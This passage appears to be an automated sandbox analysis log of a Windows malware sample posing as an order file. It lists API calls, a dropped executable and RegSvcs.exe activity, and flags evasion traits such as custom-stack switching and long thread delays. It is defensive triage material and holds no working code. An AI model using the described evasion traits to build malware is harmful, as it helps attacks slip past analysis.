              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007448D7
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007C5376
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00F848D7
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_01005376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_01005376
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00763187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00763187
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeAPI/Special instruction interceptor: Address: 1602264
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeAPI/Special instruction interceptor: Address: 1142444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599246Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599133Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599030Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598918Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598702Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598263Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597919Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597702Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597264Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597036Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596912Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596541Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596435Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596327Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595999Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595233Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594568Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594421Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594292Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594184Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599519Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
